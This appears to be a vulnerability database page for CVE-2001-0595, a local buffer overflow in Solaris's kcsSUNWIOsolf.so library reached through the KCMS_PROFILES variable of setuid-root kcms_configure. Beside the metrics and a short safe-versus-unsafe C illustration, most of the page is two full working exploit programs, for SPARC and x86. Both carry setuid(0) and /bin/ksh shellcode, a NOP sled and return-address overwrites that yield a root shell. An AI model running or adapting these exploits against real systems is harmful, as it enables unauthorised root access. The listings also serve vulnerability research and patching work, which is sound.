CVE-2001-0595 : Detail

EPSS score: 0.04% (EPSS V3)
Attack vector: Local
2002-03-09 04h00 +00:00
2002-02-24 23h00 +00:00

CVE Descriptions

Buffer overflow in the kcsSUNWIOsolf.so library in Solaris 7 and 8 allows local attackers to execute arbitrary commands via the KCMS_PROFILES environment variable, e.g. as demonstrated using the kcms_configure program.
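The bug class the description names, as an added example that is not code from this page, from LSD, or from the real kcsSUNWIOsolf.so: a hypothetical reconstruction of a setuid program's KCMS_PROFILES parser copying the variable into a fixed stack buffer with strcpy(), next to a version that bounds the copy and fails closed. The buffer size PROFILE_MAX, the ':' separator between profile entries, the function names and the sample value are all assumptions for illustration; the two exploit listings on this page overwrite exactly the kind of saved return address that the unbounded copy exposes.

```c
/* Added example: hypothetical reconstruction of the CVE-2001-0595 bug
 * class, not the real kcsSUNWIOsolf.so code. PROFILE_MAX, the ':'
 * separator and all names are assumptions for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PROFILE_MAX 256   /* assumed size of the fixed stack buffer */

/* Count ':'-separated entries in a NUL-terminated, already bounded copy. */
static int count_entries(const char *s)
{
    int n = (*s != '\0');
    for (; *s; s++)
        if (*s == ':')
            n++;
    return n;
}

/* Vulnerable pattern: strcpy() of attacker-controlled environment data
 * into a fixed-size stack buffer. A KCMS_PROFILES value of PROFILE_MAX
 * bytes or more runs past buf into the saved registers and return
 * address of this frame; in a setuid-root program that is a root shell,
 * which is what the LSD exploits on this page turn it into. */
int parse_profiles_unsafe(const char *value)
{
    char buf[PROFILE_MAX];
    strcpy(buf, value);               /* no length check at all */
    return count_entries(buf);
}

/* Hardened form: measure without reading past PROFILE_MAX, refuse input
 * that would not fit including its terminator, and only then copy.
 * Rejecting (-1) is preferred over silent truncation, which would let an
 * attacker choose which prefix of the value the program acts on. */
int parse_profiles_safe(const char *value)
{
    char buf[PROFILE_MAX];
    size_t len = 0;

    if (value == NULL)
        return 0;                     /* variable unset: nothing to parse */
    while (len < PROFILE_MAX && value[len] != '\0')
        len++;
    if (len == PROFILE_MAX)
        return -1;                    /* too long: fail closed */
    memcpy(buf, value, len + 1);      /* bounded copy including the NUL */
    return count_entries(buf);
}

/* Demo helper: hand the hardened parser a value of n 'A' bytes, to show
 * that the boundary sits at PROFILE_MAX - 1 (the longest value that fits). */
int parse_filled_safe(size_t n)
{
    char tmp[PROFILE_MAX * 4];
    if (n >= sizeof tmp)
        return -2;                    /* outside what this demo can build */
    memset(tmp, 'A', n);
    tmp[n] = '\0';
    return parse_profiles_safe(tmp);
}

int main(void)
{
    /* constructed sample value; the paths are not real profile names */
    const char *sample = "/tmp/one.icc:/tmp/two.icc:/tmp/three.icc";

    printf("safe  (%s) -> %d entries\n", sample, parse_profiles_safe(sample));
    printf("unsafe(%s) -> %d entries\n", sample, parse_profiles_unsafe(sample));
    printf("safe, %d bytes -> %d\n", PROFILE_MAX - 1,
           parse_filled_safe(PROFILE_MAX - 1));
    printf("safe, %d bytes -> %d (rejected)\n", PROFILE_MAX * 2,
           parse_filled_safe(PROFILE_MAX * 2));
    /* parse_profiles_unsafe() with the same oversized value would smash
     * this frame's saved return address, so it is deliberately not called. */
    return 0;
}
```

The practitioner's check is the same in any setuid program that reads the environment: every getenv() result must hit a length check before it touches a fixed buffer, and an over-long value should abort the run rather than be truncated.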

CVE Information

Metrics

Metrics   Score   Severity   CVSS Vector                   Source
V2        4.6     Medium     AV:L/AC:L/Au:N/C:P/I:P/A:P    (e-mail address obfuscated on the page)

The v2 vector decodes as: local access required, low attack complexity, no authentication, partial impact on confidentiality, integrity and availability.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0% to 100%). The higher the score, the greater the probability that the vulnerability will be exploited in the wild.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs, so the percentile is the way to compare one CVE's EPSS score with the rest of the population.

Exploit information

Exploit Database EDB-ID : 20767

Publication date : 1999-11-30 23h00 +00:00
Author : Last Stage of Delirium
EDB Verified : Yes

/*
 * source: https://www.securityfocus.com/bid/2605/info
 *
 * The Kodak Color Management System configuration tool 'kcms_configure' is
 * vulnerable to a buffer overflow that could yield root privileges to an
 * attacker. The bug exists in the KCMS_PROFILES environment variable parser
 * in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an
 * overly long KCMS_PROFILES variable is set and kcms_configure is
 * subsequently run, kcms_configure will overflow. Because the kcms_configure
 * binary is setuid root, the overflow allows an attacker to execute
 * arbitrary code as root. Exploits are available against Solaris x86 and
 * Solaris Sparc.
 */

/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland        *://lsd-pl.net/ #*/
/*## kcsSUNWIOsolf.so                                                       #*/

/* Includes and the int return type of main() were added so the listing
   builds cleanly; payload bytes and offsets are as published. SPARC only.
   It builds one KCMS_PROFILES value of: NOP sled, setuid(0) stub, execve
   shellcode, PCHNUM bytes of a second guessed stack address, ADRNUM bytes of
   the guessed return address, then execs the setuid-root kcms_configure with
   it. The offsets (-256-112, -512-112) are tuned to the original Solaris
   2.6/7/8 builds and need re-tuning on anything else. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOPNUM 940      /* length of the NOP sled                        */
#define ADRNUM 32       /* bytes of the guessed return address           */
#define PCHNUM 204      /* bytes of the second guessed stack address     */

char setuidcode[]=                       /* setuid(0): syscall 0x17 */
    "\x90\x08\x3f\xff"   /* and     %g0,-1,%o0    */
    "\x82\x10\x20\x17"   /* mov     0x17,%g1      */
    "\x91\xd0\x20\x08"   /* ta      8             */
;

char shellcode[]=                        /* execve("/bin/ksh"): syscall 0xb */
    "\x20\xbf\xff\xff"   /* bn,a    <shellcode-4>  */
    "\x20\xbf\xff\xff"   /* bn,a    <shellcode>    */
    "\x7f\xff\xff\xff"   /* call    <shellcode+4>  */
    "\x90\x03\xe0\x20"   /* add     %o7,32,%o0     */
    "\x92\x02\x20\x10"   /* add     %o0,16,%o1     */
    "\xc0\x22\x20\x08"   /* st      %g0,[%o0+8]    */
    "\xd0\x22\x20\x10"   /* st      %o0,[%o0+16]   */
    "\xc0\x22\x20\x14"   /* st      %g0,[%o0+20]   */
    "\x82\x10\x20\x0b"   /* mov     0xb,%g1        */
    "\x91\xd0\x20\x08"   /* ta      8              */
    "/bin/ksh"
;

/* Called through a function pointer below: returns the caller's %sp, which
   anchors the address guesses. Needs an executable data segment, as on the
   Solaris releases of the time. */
char jump[]=
    "\x81\xc3\xe0\x08"   /* jmp     %o7+8          */
    "\x90\x10\x00\x0e"   /* mov     %sp,%o0        */
;

static char nop[]="\x80\x1c\x40\x11";   /* xor %l1,%l1,%g0, used as the NOP */

int main(int argc,char **argv){
    char buffer[4096],adr[4],*b,pch[4],*envp[4],display[128];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland  //lsd-pl.net/\n");
    printf("kcsSUNWIOsolf.so solaris 2.6 2.7 2.8 sparc\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    /* guessed return address and second stack address, relative to %sp */
    *((unsigned long*)adr)=(*(unsigned long(*)())jump)()-256-112;
    *((unsigned long*)pch)=(*(unsigned long(*)())jump)()-512-112;

    /* kcms_configure is an X client, so it needs a DISPLAY to get this far */
    sprintf(display,"DISPLAY=%s",argv[1]);
    envp[0]=buffer;
    envp[1]=display;
    envp[2]=0;

    /* KCMS_PROFILES = sled | setuid stub | shellcode | pch*51 | adr*8 */
    b=buffer;
    sprintf(b,"KCMS_PROFILES=");
    b+=14;
    for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
    for(i=0;i<strlen(setuidcode);i++) *b++=setuidcode[i];
    for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
    for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp);
    return 1;   /* only reached if execle() fails */
}
Exploit Database EDB-ID : 20768

Publication date : 1999-11-30 23h00 +00:00
Author : Last Stage of Delirium
EDB Verified : Yes

/*
 * source: https://www.securityfocus.com/bid/2605/info
 *
 * The Kodak Color Management System configuration tool 'kcms_configure' is
 * vulnerable to a buffer overflow that could yield root privileges to an
 * attacker. The bug exists in the KCMS_PROFILES environment variable parser
 * in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an
 * overly long KCMS_PROFILES variable is set and kcms_configure is
 * subsequently run, kcms_configure will overflow. Because the kcms_configure
 * binary is setuid root, the overflow allows an attacker to execute
 * arbitrary code as root. Exploits are available against Solaris x86 and
 * Solaris Sparc.
 */

/*## copyright LAST STAGE OF DELIRIUM dec 1999 poland        *://lsd-pl.net/ #*/
/*## kcsSUNWIOsolf.so #*/

/* Includes and the int return type of main() were added so the listing
   builds cleanly; payload bytes and offsets are as published. x86 only.
   Unlike the SPARC version, the sled and shellcode go into a dummy
   variable "xxx=" and KCMS_PROFILES carries only ADRNUM bytes of the
   guessed return address, which points into that sled. The offset
   (+2300+8000 from %esp) is tuned to the original Solaris 7/8 x86 builds. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NOPNUM 16000    /* length of the NOP sled in the dummy variable   */
#define ADRNUM 2900     /* bytes of the guessed return address            */

/* setuid(0) then execve("/bin/ksh"). The 7-byte "lcall $7,$0; ret" syscall
   gate at offset 17 is stored with 0xff in place of its zero bytes and
   patched back to zeros at runtime (popl/incl/stosl/movb) so the string
   carries no NUL. */
char setuidshellcode[]=
    "\x33\xc0"                 /* xorl    %eax,%eax               */
    "\xeb\x08"                 /* jmp     <setuidshellcode+12>    */
    "\x5f"                     /* popl    %edi                    */
    "\x47"                     /* incl    %edi                    */
    "\xab"                     /* stosl   %eax,%es:(%edi)         */
    "\x88\x47\x01"             /* movb    %al,0x1(%edi)           */
    "\xeb\x0d"                 /* jmp     <setuidshellcode+25>    */
    "\xe8\xf3\xff\xff\xff"     /* call    <setuidshellcode+4>     */
    "\x9a\xff\xff\xff\xff"     /* lcall   $0x7,$0x0 (patched)     */
    "\x07\xff"
    "\xc3"                     /* ret                             */
    "\x33\xc0"                 /* xorl    %eax,%eax               */
    "\x50"                     /* pushl   %eax                    */
    "\xb0\x17"                 /* movb    $0x17,%al  (setuid)     */
    "\xe8\xee\xff\xff\xff"     /* call    <setuidshellcode+17>    */
    "\xeb\x16"                 /* jmp     <setuidshellcode+59>    */
    "\x33\xd2"                 /* xorl    %edx,%edx               */
    "\x58"                     /* popl    %eax                    */
    "\x8d\x78\x14"             /* leal    0x14(%eax),%edi         */
    "\x52"                     /* pushl   %edx                    */
    "\x57"                     /* pushl   %edi                    */
    "\x50"                     /* pushl   %eax                    */
    "\xab"                     /* stosl   %eax,%es:(%edi)         */
    "\x92"                     /* xchgl   %eax,%edx               */
    "\xab"                     /* stosl   %eax,%es:(%edi)         */
    "\x88\x42\x08"             /* movb    %al,0x8(%edx)           */
    "\xb0\x3b"                 /* movb    $0x3b,%al  (execve)     */
    "\xe8\xd6\xff\xff\xff"     /* call    <setuidshellcode+17>    */
    "\xe8\xe5\xff\xff\xff"     /* call    <setuidshellcode+37>    */
    "/bin/ksh"
;

/* Called through a function pointer below: returns the caller's %esp. */
char jump[]=
    "\x8b\xc4"                 /* movl    %esp,%eax               */
    "\xc3"                     /* ret                             */
;

int main(int argc,char **argv){
    char buffer[20000],*b,adr[4],*envp[4],display[128];
    int i;

    printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland  //lsd-pl.net/\n");
    printf("kcsSUNWIOsolf.so for solaris 2.7 2.8 (2.6 ?) x86\n\n");

    if(argc!=2){
        printf("usage: %s xserver:display\n",argv[0]);
        exit(-1);
    }

    /* guessed return address: somewhere inside the 16000-byte sled */
    *((unsigned int*)adr)=((*(unsigned int(*)())jump)())+2300+8000;

    sprintf(display,"DISPLAY=%s",argv[1]);
    envp[0]=&buffer[0];          /* "xxx=" sled + shellcode          */
    envp[1]=&buffer[17000];      /* "KCMS_PROFILES=" return addresses */
    envp[2]=display;
    envp[3]=0;

    b=buffer;
    sprintf(b,"xxx=");
    b+=4;
    for(i=0;i<NOPNUM;i++) *b++=0x90;
    for(i=0;i<strlen(setuidshellcode);i++) *b++=setuidshellcode[i];
    *b=0;

    b=&buffer[17000];
    sprintf(b,"KCMS_PROFILES=");
    b+=14;
    for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
    *b=0;

    execle("/usr/openwin/bin/kcms_configure","lsd","-o","lsd",0,envp);
    return 1;   /* only reached if execle() fails */
}

Products Mentioned

Configuration 0

Sun >> SunOS >> Version 5.7 (Solaris 7)

Sun >> SunOS >> Version 5.8 (Solaris 8)

References

http://www.securityfocus.com/bid/2605
Tags : vdb-entry, x_refsource_BID